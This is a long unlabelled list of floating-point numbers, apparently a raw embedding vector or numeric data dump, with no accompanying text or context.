-0.030369045212864876, -0.013985744677484035, 0.02945568971335888, -0.005023451056331396, -0.004766569938510656, 0.011459747329354286, 0.013557609170675278, -0.02835680916905403, 0.010674833320081234, -0.019908279180526733, 0.01819573901593685, -0.012744152918457985, -0.010189613327383995, 0.016212046146392822, 0.025345593690872192, -0.002700818469747901, 0.03342307358980179, 0.020550481975078583, 0.005544348619878292, 0.0046631041914224625, 0.004252808168530464, -0.002766822697594762, 0.007321109063923359, 0.02396129071712494, 0.019522957503795624, 0.012052001431584358, 0.011652408167719841, -0.0011675598798319697, -0.01351479534059763, -0.010496444068849087, -0.017553536221385002, 0.03162490576505661, 0.005091239232569933, 0.008398582227528095, -0.024432238191366196, 0.012080543674528599, -0.004252808168530464, -0.014042829163372517, -0.014021421782672405, -0.00621152576059103, -0.009854241274297237, -0.0019587178248912096, 0.004384816158562899, 0.010360867716372013, 0.003102194983512163, -0.03199595585465431, -0.028385352343320847, 0.01255149208009243, -0.02120695449411869, -0.008041802793741226, -0.007863413542509079, 0.017168214544653893, 0.001121178618632257, 0.012951084412634373, 0.016954146325588226, 0.018638145178556442, -0.015983708202838898, 0.01082468032836914, -0.008370039984583855, -0.005169730633497238, 0.0009829266928136349, -0.0022673318162560463, 0.002697250572964549, -0.006864431779831648, 0.004484714474529028, -0.002823907183483243, -0.010475036688148975, -0.006457703188061714, -0.014171269722282887, -0.005358823575079441, -0.01622631773352623, -0.0030558137223124504, -0.011645272374153137, 0.0024706958793103695, 0.0022120310459285975, 0.010774731636047363, 0.00792049802839756, 0.01819573901593685, -0.004613155033439398, 0.007463820744305849, 0.0041172318160533905, -0.002383284969255328, 0.009611631743609905, 0.01788177341222763, -0.011873611249029636, 0.03456476703286171, 0.0003378253022674471, 0.005547916516661644, 0.008398582227528095, 0.02504589967429638, -0.016240589320659637, -0.004463307559490204, -0.01679716445505619, 0.029541317373514175, -0.008798174560070038, 0.004206426441669464, 0.006154440809041262, 0.009040785022079945, -0.0020942939445376396, -0.025402678176760674, -0.01642611436545849, 0.005533645395189524, 0.01105301920324564, -0.007813463918864727, 0.010460766032338142, -0.0044276295229792595, -0.011045883409678936, -0.004456172231584787, 0.01382876094430685, 0.004648832604289055, 0.01188074704259634, 0.009476055391132832, 0.026786981150507927, -0.00776351522654295, 0.012815508060157299, 0.00035856309114024043, -0.0024724798277020454, 0.011666679754853249, 0.005822636187076569, 0.006079517304897308, 0.0025884329807013273, 0.023533156141638756, 0.0044276295229792595, -0.006696745287626982, -0.011402662843465805, 0.009411835111677647, -0.0071641262620687485, 0.016625910997390747, -0.013564744964241982, -0.009204902686178684, 0.016825705766677856, 0.004406223073601723, -0.02516006864607334, 0.0022816029377281666, 0.007863413542509079, -0.0006274853949435055, 0.005687060300260782, -0.007478091865777969, 0.01053925696760416, -0.00929766520857811, 0.004798680078238249, -0.01980837993323803, 0.013850168325006962, 0.007132016122341156, 0.005690628197044134, -0.0053053065203130245, -0.009219174273312092, 0.0076493457891047, -0.0032449066638946533, -0.0073496513068675995, 0.00006210187711985782, -0.007217642851173878, -0.02146383561193943, -0.00827727746218443, -0.0075993966311216354, -0.007613667752593756, -0.01602652110159397, -0.010831816121935844, -0.0042028590105473995, 0.025117255747318268, -0.007085634861141443, 0.012737017124891281, -0.01392865926027298, 0.014585133641958237, -0.0006801103008911014, 0.0012576465960592031, 0.025445491075515747, 0.004595316015183926, -0.02690115012228489, -0.005194704979658127, -0.015227335505187511, -0.01296535599976778, 0.008519886992871761, -0.007253320887684822, 0.0005596973351202905, -0.0076850238256156445, -0.01539858989417553, -0.008605513721704483, 0.017910314723849297, -0.0005650490638799965, -0.003212796524167061, -0.007296134252101183, 0.019965363666415215, 0.005633543245494366, 0.0010979879880324006, 0.018024485558271408, 0.028185555711388588, 0.019194720312952995, 0.012801237404346466, -0.0007055308669805527, 0.005943941418081522, 0.0013976824702695012, -0.020407769829034805, -0.0070749311707913876, 0.0019016331061720848, 0.00034629879519343376, 0.01504181046038866, -0.010524986311793327, 0.01815292425453663, -0.003410808974877, -0.0005775362951681018, 0.013172287493944168, -0.0008825825061649084, 0.017596349120140076, 0.020921532064676285, -0.023547425866127014, -0.014670760370790958, 0.0074709560722112656, -0.01808157004415989, 0.018623873591423035, -0.033308904618024826, -0.03339453041553497, -0.01962285488843918, -0.0002820785448420793, 0.01692560501396656, -0.028585148975253105, -0.007991854101419449, -0.011716628447175026, -0.00023837308981455863, -0.02434661239385605, 0.010960256680846214, -0.0034001057501882315, 0.007713566068559885, 0.0005815500626340508, 0.014206947758793831, -0.015070352703332901, -0.014713574200868607, -0.023861391469836235, -0.003574927570298314, 0.022320106625556946, 0.00566922128200531, -0.02658718451857567, -0.013557609170675278, 0.005301738623529673, -0.019266076385974884, -0.001520771300420165, 0.006593279540538788, -0.01751072332262993, -0.0002564350434113294, 0.01280837319791317, -0.002768606413155794, -0.0076850238256156445, -0.024417968466877937, 0.013871574774384499, 0.010846087709069252, 0.00032087828731164336, -0.01769624836742878, 0.007585125509649515, -0.0026330305263400078, 0.029141724109649658, -0.008741090074181557, 0.0050341542810201645, -0.010988798923790455, 0.0057655517011880875, 0.025830812752246857, 0.009911325760185719, 0.020207973197102547, -0.003978088032454252, 0.019951092079281807, -0.012280339375138283, 0.0003567792009562254, 0.005508670583367348, -0.005833339877426624, -0.010203884914517403, -0.011431205086410046, 0.001319191069342196, 0.002322632586583495, -0.00568349240347743, -0.0013477334287017584, 0.020093804225325584, -0.010389409959316254, 0.006022432819008827, 0.006814482621848583, 0.007727837190032005, 0.011559645645320415, 0.0037212069146335125, 0.011552509851753712, 0.010653426870703697, -0.013764540664851665, -0.00776351522654295, -0.0068037789314985275, -0.012601440772414207, 0.008769632317125797, 0.013043846935033798, -0.0023458232171833515, -0.010803273878991604, 0.012123356573283672, 0.022405732423067093, 0.0012612143764272332, 0.005016315262764692, 0.01725384220480919, 0.022519903257489204, 0.02381857857108116, 0.0003233311290387064, 0.00451682461425662, 0.001055174507200718, -0.013914388604462147, 0.0017357307951897383, -0.008377175778150558, 0.0013575447956100106, -0.002315497025847435, -0.017482180148363113, 0.004780841059982777, -0.0071213124319911, -0.012016323395073414, 0.003366211662068963, -0.01685424894094467, -0.00212283618748188, -0.015341505408287048, -0.015626927837729454, -0.006814482621848583, -0.006967897526919842, -0.006479110103100538, 0.005444450303912163, -0.0018623874057084322, 0.01159532368183136, -0.004531095735728741, -0.01265139039605856, -0.042642246931791306, -0.005651382263749838, 0.013964337296783924, -0.009112140163779259, 0.01366464328020811, 0.0034696776419878006, -0.004024469293653965, -0.0012282123789191246, 0.007528041023761034, -0.009932732209563255, 0.024104002863168716, -0.013022440485656261, 0.002303009619936347, 0.008227327838540077, -0.0037319103721529245, 0.03290931135416031, -0.022391462698578835, -0.0004156477516517043, -0.005533645395189524, -0.004755866713821888, 0.016897061839699745, -0.003223499981686473, -0.020236516371369362, 0.03188178688287735, -0.010417952202260494, -0.015926623716950417, 0.008377175778150558, -0.00014951277989894152, -0.019508685916662216, 0.01686852052807808, -0.021435294300317764, 0.016055064275860786, -0.007142719347029924, -0.028927655890583992, 0.007592261303216219, 0.01296535599976778, 0.015213064849376678, 0.03827527165412903, -0.01051071472465992, -0.000025615630875108764, -0.004170748870819807, 0.004827222321182489, -0.03365141153335571, -0.00881958194077015, 0.006279313936829567, 0.03642002120614052, -0.004987773019820452, 0.003428647993132472, 0.0013637884985655546, -0.001130098127759993, 0.007060660049319267, -0.003756884951144457, 0.006946490611881018, -0.030311960726976395, 0.010103986598551273, -0.01488482765853405, 0.017853230237960815, -0.009690122678875923, 0.006721720099449158, 0.002493886509910226, -0.007927633821964264, -0.010296647436916828, -0.010624884627759457, 0.010332325473427773, -0.01306525431573391, -0.004145774058997631, 0.01265139039605856, 0.03470747917890549, 0.01980837993323803, 0.01527014933526516, 0.004688078537583351, -0.005123349372297525, 0.0036569866351783276, -0.018381264060735703, -0.01571255549788475, -0.0060367039404809475, 0.021306853741407394, 0.02721511572599411, -0.014021421782672405, 0.00344827095977962, -0.0009713313193060458, 0.012622848153114319, -0.015255877748131752, -0.008598378859460354, -0.004402655176818371, 0.016625910997390747, -0.0068287537433207035, -0.009754342958331108, 0.012665661051869392, 0.019836923107504845, -0.014035693369805813, -0.0018927135970443487, 0.01571255549788475, 0.027700336650013924, -0.021506650373339653, 0.0022066792007535696, 0.0020586159080266953, -0.008034667000174522, 0.005198272876441479, -0.005858314223587513, -0.014842013828456402, -0.009397563524544239, -0.002242357237264514, 0.008034667000174522, -0.005904695484787226, -0.0031093305442482233, -0.002706170082092285, -0.005134052596986294, 0.015684012323617935, 0.012672796845436096, 0.0003416160761844367, -0.004213562235236168, 0.021049972623586655, 0.017068317160010338, 0.009668716229498386, -0.025787999853491783, -0.005426611285656691, -0.024489322677254677, 0.01092457864433527, -0.00011188372445758432, -0.002422530669718981, -0.01661163941025734, 0.006218661088496447, 0.0264587439596653, 0.009397563524544239, 0.00871968362480402, -0.007057092152535915, -0.003303775331005454, -0.011474018916487694, -0.0013477334287017584, 0.0033412370830774307, 0.0019390948582440615, -0.023590240627527237, 0.015184522606432438, -0.007449549622833729, 0.0005177757702767849, 0.011659543961286545, 0.006543330382555723, -0.0014842014061287045, -0.005744144786149263, -0.0010043333750218153, -0.006810914725065231, -0.02548830583691597, -0.0014110617339611053, 0.03262389078736305, -0.015812452882528305, -0.005016315262764692, 0.028513792902231216, 0.0029380766209214926, 0.003885325277224183, 0.0007652913336642087, -0.0025402677711099386, -0.00263481424190104, 0.00763507466763258, -0.025502575561404228, 0.005069832317531109, 0.008541293442249298, -0.007727837190032005, 0.019066279754042625, 0.006589711643755436, -0.0015653687296435237, -0.016397571191191673, -0.021478107199072838, -0.007884819991886616, -0.0005824420368298888, 0.016511740162968636, 0.022776782512664795, 0.018366992473602295, -0.01903773844242096, -0.004695214331150055, -0.00461672293022275, 0.004138638731092215, -0.006661067251116037, -0.016625910997390747, -0.017025502398610115, 0.0023939884267747402, -0.007577990181744099, 0.0070784990675747395, 0.015755368396639824, -0.00037930088001303375, -0.002024721819907427, 0.0017678409349173307, -0.024446509778499603, -0.03419371694326401, 0.008769632317125797, 0.01297249086201191, 0.00737819354981184, -0.013471982441842556, -0.015940893441438675, 0.00043259476660750806, -0.007007143460214138, -0.0013994664186611772, 0.013593287207186222, -0.007770650554448366, -0.016625910997390747, -0.008120294660329819, 0.007335380185395479, -0.013422032818198204, 0.024574950337409973, 0.024289527907967567, -0.00022677777451463044, -0.003671257756650448, 0.004880739375948906, -0.003230635542422533, 0.009768614545464516, 0.0036141732707619667, -0.02491745911538601, 0.0010293079540133476, 0.03211012855172157, -0.003706935793161392, 0.01833845116198063, 0.004509688820689917, -0.014520913362503052, -0.0006850160425528884, 0.02899901196360588, 0.00435984181240201, 0.015284420922398567, -0.0031307374592870474, -0.009090733714401722, 0.02179207280278206, -0.009197767823934555, -0.019251804798841476, -0.02319064736366272, -0.018252823501825333, -0.002031857380643487, 0.011295628733932972, -0.004395519383251667, 0.007082066964358091, 0.011409798637032509, 0.011823662556707859, -0.003924570977687836, 0.01239450927823782, -0.008398582227528095, -0.011809390969574451, -0.013714591972529888, -0.006443432066589594, -0.0012835131492465734, 0.006375643890351057, 0.026344574987888336, -0.03616314008831978, 0.006115195341408253, 0.008469938300549984, -0.019851194694638252, -0.017781874164938927, -0.003888893174007535, -0.004449036438018084, 0.002775742206722498, 0.004684510640799999, -0.012216119095683098, -0.010475036688148975, -0.02197759784758091, 0.00119342643301934, 0.013521931134164333, 0.008063209243118763, -0.012637118808925152, 0.014107049442827702, -0.003095059422776103, -0.01149542536586523, -0.007463820744305849, -0.01545567438006401, -0.017353739589452744, -0.01845262013375759, -0.012216119095683098, 0.021706445142626762, -0.019951092079281807, -0.010988798923790455, -0.02708667516708374, 0.012744152918457985, 0.0043669771403074265, -0.011474018916487694, -0.010375138372182846, -0.012159034609794617, -0.02982673980295658, -0.0022031115368008614, 0.015227335505187511, -0.01069623976945877, -0.028970470651984215, 0.0339939221739769, -0.020165160298347473, 0.017781874164938927, 0.014064235612750053, -0.008940886706113815, -0.01642611436545849, 0.011709492653608322, -0.004438333213329315, -0.013614693656563759, 0.007196236401796341, -0.027072405442595482, -0.004249240271747112, 0.002645517699420452, -0.024389425292611122, -0.00673955911770463, -0.010068308562040329, 0.010674833320081234, -0.008034667000174522, -0.007877684198319912, -0.00485576456412673, 0.0072247786447405815, 0.002773958258330822, 0.03667690232396126, -0.004680942744016647, 0.01858106069266796, 0.00011188372445758432, 0.011074425652623177, -0.029170267283916473, -0.021734988316893578, -0.0008897181251086295, -0.011231408454477787, 0.011531103402376175, 0.008605513721704483, -0.005173298064619303, -0.015669742599129677, 0.029598401859402657, -0.0056157042272388935, -0.014035693369805813, 0.026872608810663223, 0.025588203221559525, -0.006529059261083603, 0.0015091759851202369, 0.014264032244682312, 0.00802039634436369, -0.005794093944132328, 0.01532723382115364, 0.008477073162794113, -0.006921516265720129, -0.004884307272732258, 0.0026758438907563686, 0.0014235489070415497, -0.033765584230422974, -0.025773728266358376, -0.026715625077486038, -0.005401636939495802, -0.017325198277831078, -0.0010346596827730536, -0.011795120313763618, 0.006996439769864082, 0.0021567302756011486, -0.0003088369849137962, 0.011160053312778473, 0.0017749764956533909, 0.028927655890583992, -0.00887666642665863, 0.02541694976389408, 0.0047879768535494804, -0.007877684198319912, -0.0007701970753259957, 0.0007733188685961068, -0.030197789892554283, 0.0052660610526800156, -0.01190928928554058, -0.009219174273312092, -0.0012192928697913885, -0.009504597634077072, -0.0035517369396984577, 0.0053695267997682095, -0.004120799712836742, 0.01615496166050434, -0.02434661239385605, -0.022377191111445427, -0.0032645296305418015, -0.01878085732460022, 0.01736801117658615, 0.02503162808716297, 0.0016741863219067454, 0.012430187314748764, -0.009433241561055183, -0.019308889284729958, -0.015626927837729454, 0.0031860382296144962, 0.02721511572599411, -0.0014422798994928598, -0.015370047651231289, 0.011573917232453823, -0.00606881408020854, 0.023162104189395905, 0.01815292425453663, -0.009005106985569, -0.01615496166050434, -0.002829259028658271, 0.01604079268872738, -0.01808157004415989, 0.008448530919849873, -0.004434765316545963, 0.014435285702347755, 0.01865241676568985, -0.007799193263053894, 0.010567799210548401, 0.014249760657548904, -0.006554033607244492, 0.021620819345116615, 0.009897055104374886, 0.0011434772750362754, -0.00696432963013649, 0.021349666640162468, 0.021321123465895653, -0.0056799245066940784, 0.006571872625499964, -0.005448018200695515, -0.024503594264388084, -0.0038104017730802298, 0.0055800266563892365, -0.009254852309823036, 0.011709492653608322, 0.010032630525529385, -0.00002677237534953747, 0.005462289322167635, -0.0018079784931614995, 0.022220207378268242, 0.021449564024806023, -0.005676357075572014, 0.01840980537235737, -0.008341497741639614, 0.007734972983598709, 0.011324171908199787, -0.004456172231584787, 0.009918461553752422, 0.0009784669382497668, 0.0014717141166329384, -0.006275746040046215, 0.0020942939445376396, -0.014478099532425404, -0.010489308275282383, 0.004955662880092859, -0.00368196121416986, -0.020265057682991028, 0.0028114200104027987, -0.03462185338139534, 0.02190624177455902, -0.011652408167719841, -0.0018820102559402585, -0.002238789340481162, -0.011552509851753712, 0.0007033009896986187, 0.03365141153335571, -0.035677917301654816, 0.0070749311707913876, -0.03008362092077732, -0.0009392212377861142, 0.023547425866127014, 0.009982681833207607, -0.012794101610779762, 0.007813463918864727, -0.0002002423134399578, -0.02420390024781227, 0.01661163941025734, -0.012622848153114319, 0.00144941546022892, -0.007963311858475208, -0.008769632317125797, -0.020079532638192177, -0.015213064849376678, -0.010831816121935844, -0.014870557002723217, 0.013850168325006962, 0.000990062253549695, -0.03916008397936821, 0.007813463918864727, 0.012815508060157299, -0.007734972983598709, 0.005897560156881809, -0.009568817913532257, -0.019151907414197922, -0.0017553536454215646, 0.02555966190993786, -0.004816519096493721, 0.009511733427643776, -0.003928138874471188, 0.0013405977515503764, 0.00039290307904593647, -0.009590224362909794, -0.017453638836741447, 0.0008754469454288483, 0.02414681576192379, -0.008548429235816002, -0.000013400124771578703, 0.009454648941755295, 0.01363610103726387, -0.006910813041031361, 0.019879736006259918, 0.0055122384801507, 0.01319369487464428, 0.011780848726630211, 0.002033641329035163, -0.025573931634426117, -0.0007104365504346788, -0.012144763953983784, -0.011488289572298527, 0.009904189966619015, -0.010168206878006458, -0.005333848763257265, -0.003813969437032938, -0.007028549909591675, 0.0018053026869893074, 0.015098894946277142, 0.014670760370790958, -0.010425087995827198, -0.005840475205332041, 0.002567026298493147, 0.025959253311157227, 0.011581052094697952, -0.005587161984294653, -0.015241607092320919, 0.003953113220632076, 0.023775765672326088, 0.006118763238191605, 0.0064077540300786495, -0.0019587178248912096, -0.00184098060708493, 0.002852449659258127, -0.020907260477542877, 0.024260984733700752, -0.0010266321478411555, 0.0016242372803390026, 0.015498488210141659, -0.005387365818023682, -0.0058511788956820965, -0.009012242779135704, -0.007677888032048941, 0.003806833876296878, -0.01108156144618988, 0.012030594050884247, 0.018866483122110367, -0.005626407917588949, -0.004959230776876211, -0.005808365065604448, -0.004709485452622175, -0.012351695448160172, 0.009476055391132832, -0.009005106985569, 0.002691898960620165, 0.0005106402095407248, -0.018481161445379257, 0.008441396057605743, 0.0017954913200810552, 0.00689654191955924, 0.015241607092320919, -0.015213064849376678, 0.013443440198898315, 0.02842816524207592, 0.013678913936018944, -0.014642218127846718, 0.014998997561633587, 0.014899099245667458, 0.029997995123267174, -0.006575440522283316, 0.009154953993856907, 0.008541293442249298, -0.0030094324611127377, -0.003089707810431719, -0.0004024915106128901, 0.0061829835176467896, -0.006443432066589594, -0.003360860049724579, 0.003949545789510012, 0.009939868003129959, -0.007189100608229637, 0.018952110782265663, -0.0019551499281078577, -0.02114987000823021, 0.0002002423134399578, 0.012216119095683098, -0.004980637691915035, 0.0009998736204579473, -0.02625894919037819, -0.005376662593334913, -0.014099913649260998, 0.003178902668878436, -0.002458208706229925, -0.022077497094869614, -0.010853222571313381, 0.011887882836163044, -0.00739246467128396, -0.013486253097653389, 0.009825699031352997, -0.0045988839119672775, -0.0028025005012750626, 0.017039773985743523, -0.0071641262620687485, -0.0013352461392059922, -0.008669734001159668, 0.0014877691864967346, 0.016454655677080154, 0.005262493155896664, -0.012094814330339432, 0.0002698142488952726, -0.011845069006085396, 0.010417952202260494, -0.02177780121564865, -0.01935170404613018, 0.015056082047522068, -0.005405204836279154, -0.0012665661051869392, -0.01444242149591446, 0.0004486498364713043, 0.017039773985743523, -0.004905713722109795, 0.02862796187400818, 0.00903364922851324, 0.008662599138915539, -0.007884819991886616, 0.025773728266358376, -0.005166162736713886, -0.015926623716950417, 0.0024796153884381056, 0.007770650554448366, 0.011324171908199787, 0.0008098887628875673, -0.00884812418371439, -0.004955662880092859, 0.01878085732460022, 0.009533139877021313, -0.0058511788956820965, 0.010189613327383995, -0.015098894946277142, 0.0029452121816575527, 0.003152144141495228, -0.0002455086796544492, 0.013907252810895443, 0.002629462629556656, 0.007313973270356655, -0.012358831241726875, 0.002358310390263796, 0.005069832317531109, 0.0037675881758332253, -0.010403681546449661, -0.0005766443791799247, -0.012587170116603374, 0.006026000715792179, -0.020793091505765915, 0.01203772984445095, 0.023404715582728386, -0.007149855140596628, -0.02644447423517704, -0.016055064275860786, -0.010717647150158882, 0.004830790217965841, 0.0003052692045457661, 0.025459762662649155, -0.0013682481367141008, 0.013001034036278725, 0.009468919597566128, -0.017268111929297447, 0.011388391256332397, 0.01354333758354187, 0.015341505408287048, 0.0009588440880179405, 0.0003884433535858989, 0.004095824901014566, 0.0028114200104027987, -0.01615496166050434, -0.00737819354981184, -0.006857295986264944, 0.028413895517587662, 0.009947003796696663, 0.025887897238135338, -0.005697763524949551, -0.01973702386021614, -0.007984718307852745, -0.0031343051232397556, -0.006404186598956585, -0.006140169687569141, 0.003756884951144457, 0.007478091865777969, 0.005276764277368784, -0.0020675354171544313, -0.009197767823934555, 0.01698268949985504, 0.02056475169956684, -0.008933750912547112, -0.00939042866230011, -0.012194712646305561, 0.005665653385221958, 0.021435294300317764, 0.007064227946102619, 0.026558643206954002, 0.02543122135102749, -0.018110111355781555, 0.00029188996995799243, -0.018880754709243774, 0.002556322840973735, 0.007478091865777969, -0.006361372768878937, -0.0035517369396984577, -0.0023493908811360598, -0.017268111929297447, 0.01712540164589882, 0.0000024424043658655137, -0.012287475168704987, 0.00024216387828346342, 0.002706170082092285, -0.0007572638569399714, -0.006022432819008827, 0.0030076485127210617, -0.01296535599976778, 0.023105019703507423, -0.002966618863865733, -0.04598170146346092, 0.0033430210314691067, 0.0028578012716025114, 0.007991854101419449, 0.018623873591423035, -0.025188609957695007, 0.006304288282990456, 0.007335380185395479, -0.011559645645320415, -0.00999695248901844, 0.010239562951028347, -0.018024485558271408, 0.011531103402376175, -0.006268610246479511, 0.01501326821744442, 0.01309379655867815, 0.009326208382844925, 0.008584107272326946, 0.011738034896552563, 0.010603477247059345, 0.007449549622833729, 0.011117239482700825, -0.023718681186437607, -0.0019390948582440615, 0.0034785971511155367, -0.0014306845841929317, 0.017068317160010338, -0.015512758865952492, -0.003630228340625763, 0.000661825411953032, -0.010860358364880085, 0.0152986915782094, 0.012565762735903263, -0.0067681013606488705, -0.018181467428803444, -0.024161087349057198, 0.003956681117415428, -0.0155270304530859, -0.006586143746972084, 0.011523967608809471, 0.010218155570328236, 0.004288485739380121, -0.004420494195073843, 0.003079004352912307, 0.015155980363488197, -0.0078063285909593105, 0.0028114200104027987, 0.01858106069266796, 0.002035425277426839, -0.007306837942451239, -0.010346596129238605, -0.0019194720080122352, 0.01392152439802885, -0.022077497094869614, -0.001254970789887011, 0.01488482765853405, -0.009533139877021313, -0.006818050518631935, -0.0054908315651118755, 0.0022013275884091854, 0.013686049729585648, -0.007699294947087765, -0.0032056609634310007, -0.013372084125876427, -0.002294090110808611, 0.02899901196360588, 0.017667705193161964, 0.022320106625556946, 0.02153519168496132, 0.005330280866473913, -0.0037818592973053455, -0.015512758865952492, 0.008940886706113815, -0.005893992260098457, 0.0035945503041148186, -0.004045876208692789, -0.005373094696551561, 0.013950066640973091, 0.001526123029179871, 0.01698268949985504, 0.012244661338627338, -0.01198064535856247, -0.02587362751364708, 0.009575953707098961, -0.016112148761749268, -0.01629767380654812, -0.0006065246416255832, 0.016682995483279228, 0.015983708202838898, 0.0004370545211713761, -0.00019310673815198243, -0.01545567438006401, -0.017867501825094223, 0.015312963165342808, 0.012059136293828487, 0.0035356818698346615, -0.007998988963663578, -0.004506121389567852, -0.0007211399497464299, 0.012886864133179188, -0.012223254889249802, -0.017453638836741447, 0.03079717978835106, -0.006850160658359528, -0.003967384807765484, -0.00009822576976148412, -0.00275611924007535, -0.01591235212981701, 0.0037212069146335125, -0.02971257083117962, 0.020978616550564766, 0.01434252317994833, 0.013129474595189095, -0.012715610675513744, 0.0007282755104824901, -0.007181965280324221, 0.010011224076151848, -0.000982034718617797, -0.03333744779229164, 0.00021116867719683796, -0.01833845116198063, -0.0126799326390028, -0.005929670296609402, -0.009240580722689629, -0.0026847633998841047, 0.0003828686603810638, -0.005433747079223394, -0.014071371406316757, -0.03208158537745476, 0.008106023073196411, 0.04358414560556412, 0.019194720312952995, 0.018466891720891, 0.016012249514460564, 0.005722738336771727, -0.02925589308142662, 0.005801229737699032, -0.00669317739084363, 0.016882792115211487, -0.0035874147433787584, -0.01444242149591446, -0.012380237691104412, 0.01532723382115364, -0.008362904191017151, -0.007428142707794905, 0.007428142707794905, -0.008648327551782131, 0.01504181046038866, 0.007271159905940294, 0.007271159905940294, 0.0005409664590843022, -0.0043883840553462505, -0.006479110103100538, 0.009012242779135704, 0.0003376023087184876, 0.007064227946102619, 0.029626943171024323, 0.0003034852852579206, -0.005023451056331396, 0.001390546909533441, -0.0158980805426836, 0.015484216623008251, -0.013486253097653389, 0.017225299030542374, 0.0037889950908720493, 0.0010186046129092574, -0.0025349161587655544, -0.008391446433961391, 0.006272178143262863, 0.0224200040102005, 0.006297152489423752, 0.010446494445204735, -0.018566789105534554, 0.0110244769603014, 0.0003770710027310997, -0.0009392212377861142, -0.017810417339205742, -0.02082163281738758, 0.0009659796487540007, -0.019594313576817513, 0.01229461096227169, 0.0015038242563605309, -0.0032431227155029774, -0.012173306196928024, -0.014713574200868607, -0.022248750552535057, 0.0038746220525354147, 0.014399607665836811, -0.01130990032106638, 0.009404699318110943, 0.020279329270124435, 0.034593310207128525, -0.002315497025847435, 0.008198785595595837, 0.006065246183425188, 0.017653433606028557, -0.007321109063923359, 0.0015537734143435955, -0.00970439426600933, -0.008498480543494225, 0.02172071672976017, 0.005715602543205023, -0.006593279540538788, -0.003995927050709724, -0.0010105770779773593, -0.0016099660424515605, 0.004809383302927017, 0.0021567302756011486, 0.0030379747040569782, 0.013079524971544743, 0.010853222571313381, 0.007146287243813276, -0.015312963165342808, 0.007007143460214138, -0.009483191184699535, -0.002709737978875637, -0.007556583266705275, 0.017082586884498596, -0.008498480543494225, 0.019822651520371437, 0.008919479325413704, 0.007799193263053894, 0.02089298889040947, 0.019137635827064514, -0.00954741146415472, -0.005844043102115393, 0.007692159153521061, 0.015384318307042122, 0.02095007337629795, 0.016397571191191673, 0.004727324470877647, -0.01306525431573391, 0.00986851193010807, 0.00996127538383007, -0.004188587889075279, 0.002563458401709795, 0.004459739662706852, -0.01942305825650692, 0.008584107272326946, -0.0018133302219212055, 0.032994940876960754, 0.006735991220921278, -0.009347614832222462, 0.0055800266563892365, -0.013422032818198204, 0.0204933974891901, 0.04284204542636871, 0.014264032244682312, 0.007064227946102619, -0.025088712573051453, 0.0008839204674586654, 0.0018079784931614995, -0.03724774718284607, 0.024817559868097305, 0.002693682909011841, 0.009618766605854034, 0.008291548117995262, 0.005729873664677143, 0.009283394552767277, 0.009376157075166702, -0.0048700361512601376, -0.010903172194957733, 0.027001049369573593, -0.006332830525934696, -0.017582077533006668, 0.0026669243816286325, 0.02306220680475235, -0.025531118735671043, 0.02210603840649128, 0.024375153705477715, 0.0011408014688640833, -0.012023458257317543, -0.011409798637032509, -0.008598378859460354, -0.012351695448160172, -0.005187569186091423, -0.01591235212981701, -0.0010962040396407247, -0.006839456968009472, 0.008006124757230282, 0.001383411348797381, -0.0034875166602432728, -0.010681969113647938, -0.012473000213503838, 0.0034500546753406525, 0.01293681375682354, -0.029541317373514175, -0.006675338838249445, -0.004852197133004665, 0.0034054573625326157, 0.011295628733932972, -0.0033144785556942225, 0.0033876183442771435, -0.0036569866351783276, -0.023918475955724716, 0.00407441845163703, 0.001842764555476606, 0.0002562120498623699, -0.01511316653341055, 0.014135591685771942, -0.0036391476169228554, 0.007877684198319912, -0.029098911210894585, -0.012101950123906136, 0.031453654170036316, -0.01306525431573391, 0.021549463272094727, -0.0008058749954216182, 0.00016344946925528347, 0.011631001718342304, 0.009947003796696663, 0.01604079268872738, -0.020736007019877434, 0.0015056082047522068, 0.0027275769971311092, -0.005301738623529673, 0.0005503318971022964, -0.03533541038632393, -0.010931714437901974, -0.00776351522654295, 0.00008178048301488161, -0.002699034521356225, -0.008555565029382706, -0.0004334867116995156, 0.0014645785558968782, 0.0016973769525066018, 0.0051840017549693584, -0.0007978474604897201, 0.01967993937432766, 0.013564744964241982, 0.010389409959316254, 0.005387365818023682, -0.02555966190993786, 0.009761478751897812, -0.009697258472442627, 0.007178397383540869, 0.00036525269388221204, -0.024061188101768494, -0.027700336650013924, -0.011031612753868103, 0.0003770710027310997, 0.012216119095683098, -0.016440385952591896, 0.016511740162968636, 0.010467901825904846, -0.022191666066646576, 0.01962285488843918, -0.005005612038075924, 0.0022619799710810184, 0.010018359869718552, -0.019323160871863365, 0.02190624177455902, 0.002172785345464945, 0.003355508204549551, 0.0314251109957695, -0.02286241017282009, -0.033622872084379196, -0.02172071672976017, -0.017396552488207817, -0.002511725528165698, 0.00033960919245146215, -0.014842013828456402, 0.016511740162968636, -0.040587201714515686, -0.00737819354981184, 0.016568824648857117, 0.01731092669069767, 0.004195723216980696, 0.020207973197102547, -0.006514788139611483, 0.00022432491823565215, -0.019394516944885254, 0.0033269659616053104, 0.009326208382844925, 0.008969428949058056, -0.000020250006855349056, 0.0009258419740945101, 0.01949441432952881, -0.0029755383729934692, -0.01674007996916771, 0.05032013729214668, 0.009361885488033295, 0.026430202648043633, 0.0034785971511155367, 0.00045756931649520993, 0.011745170690119267, 0.0071213124319911, -0.0135076604783535, -0.016468927264213562, 0.00999695248901844, -0.013907252810895443, 0.0025456196162849665, 0.020778819918632507, -0.007057092152535915, -0.017596349120140076, 0.02102142944931984, -0.005822636187076569, -0.002643733751028776, -0.010275240987539291, -0.012337424792349339, -0.016882792115211487, 0.004927120637148619, 0.019594313576817513, -0.013586151413619518, 0.010082580149173737, 0.0158980805426836, -0.011538239195942879, -0.015698283910751343, 0.0046381293796002865, 0.0010863926727324724, 0.027486268430948257, -0.017995942384004593, -0.017482180148363113, 0.025402678176760674, -0.010503578931093216, 0.002513509476557374, 0.012187576852738857, 0.021107057109475136, 0.0001676862157182768, -0.012066272087395191, 0.004930688533931971, 0.017196757718920708, -0.011202866211533546, 0.000024249835405498743, 0.006439864169806242, -0.005819068755954504, 0.012230390682816505, 0.0020782388746738434, 0.013892981223762035, 0.012116221711039543, 0.00673955911770463, 0.011060154996812344, -0.007577990181744099, 0.0025795134715735912, 0.0036427155137062073, -0.0032431227155029774, 0.004477578680962324, -0.003100411267951131, 0.0006493381224572659, -0.020407769829034805, -0.0012308881850913167, -0.010268105193972588, -0.007146287243813276, -0.004609587136656046, -0.02057902328670025, -0.016083605587482452, 0.00881958194077015, 0.012073407880961895, -0.024303797632455826, 0.019337432458996773, -0.0002704832295421511, 0.002977322321385145, -0.028770674020051956, 0.009725800715386868, -0.013992879539728165, -0.004937823861837387, 0.005358823575079441, -0.005084103439003229, 